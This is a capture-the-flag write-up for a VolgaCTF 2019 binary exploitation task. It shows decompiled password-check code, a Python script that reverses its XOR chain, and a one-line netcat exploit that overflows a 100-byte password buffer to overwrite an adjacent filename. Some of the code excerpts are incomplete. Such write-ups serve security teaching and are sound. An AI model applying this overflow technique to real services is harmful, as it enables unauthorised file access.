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Category : PWN

We are given a binary and a connection

nc warm.q.2019.volgactf.ru 443

On decompiling with Ghidra, some functions that seem interesting

undefined4 FUN_00010788(byte *pbParm1)

  size_t sVar1;
  undefined4 uVar2;
  sVar1 = strlen((char *)pbParm1);
  if (sVar1 < 0x10) {
    uVar2 = 1;
  else {
    if (((((*pbParm1 == 0x76) && ((pbParm1[1] ^ *pbParm1) == 0x4e)) &&
         ((pbParm1[2] ^ pbParm1[1]) == 0x1e)) &&
        ((((pbParm1[3] ^ pbParm1[2]) == 0x15 && ((pbParm1[4] ^ pbParm1[3]) == 0x5e)) &&
         (((pbParm1[5] ^ pbParm1[4]) == 0x1c &&
          (((pbParm1[6] ^ pbParm1[5]) == 0x21 && ((pbParm1[7] ^ pbParm1[6]) == 1)))))))) &&
       (((pbParm1[8] ^ pbParm1[7]) == 0x34 &&
        ((((((pbParm1[9] ^ pbParm1[8]) == 7 && ((pbParm1[10] ^ pbParm1[9]) == 0x35)) &&
           ((pbParm1[0xb] ^ pbParm1[10]) == 0x11)) &&
          (((pbParm1[0xc] ^ pbParm1[0xb]) == 0x37 && ((pbParm1[0xd] ^ pbParm1[0xc]) == 0x3c)))) &&
         (((pbParm1[0xe] ^ pbParm1[0xd]) == 0x72 && ((pbParm1[0xf] ^ pbParm1[0xe]) == 0x47)))))))) {
      uVar2 = 0;
    else {
      uVar2 = 2;
  return uVar2;

Cracking the password seems obvious

The following script did it.

input =[0x76,0x4e, 0x1e, 0x15, 0x5e, 0x1c, 0x21, 1, 0x34, 7, 0x35, 0x11, 0x37, 0x3c, 0x72, 0x47]
passwd = chr(input[0])
last = input[0]
for i in range(1,len(input)):
    val = last ^ input[i]
    last = val


we get v8&3mqPQebWFqM?x as the password.

lets connect via netcat

Hi there! I've been waiting for your password!
Seek file with something more sacred!

Gotta find some other vulns

undefined4 FUN_000109ec(void)

  int __c;
  FILE *__stream;
  char acStack220 [100];
  char acStack120 [100];
  int local_14;
  local_14 = __stack_chk_guard;
  setvbuf(stdout,(char *)0x0,2,0);
  while( true ) {
    while( true ) {
      puts("Hi there! I\'ve been waiting for your password!");
      __c = FUN_00010788(acStack220);
      if (__c == 0) break;
    __stream = fopen(acStack120,"rb");
    if (__stream != (FILE *)0x0) break;
  while (__c = _IO_getc((_IO_FILE *)__stream), __c != -1) {
  if (local_14 == __stack_chk_guard) {
    return 0;
                    /* WARNING: Subroutine does not return */

In FUN_00010788 only a lower bound on the password is checked, the vulnerability could be a Buffer Overflow

In FUN_000109ec we can see that, we can overwrite the buffer where file name is stored. So, we need a file name,

According to Seek file with something more sacred!, File name could be sacred

The password input buffer is 100 bytes, the password is 16 Bytes. so we overflow the rest with 84*A

Final exploit

python -c "print('v8&3mqPQebWFqM?x'+'A'*84+'sacred');" | nc warm.q.2019.volgactf.ru 443 

We get the flag
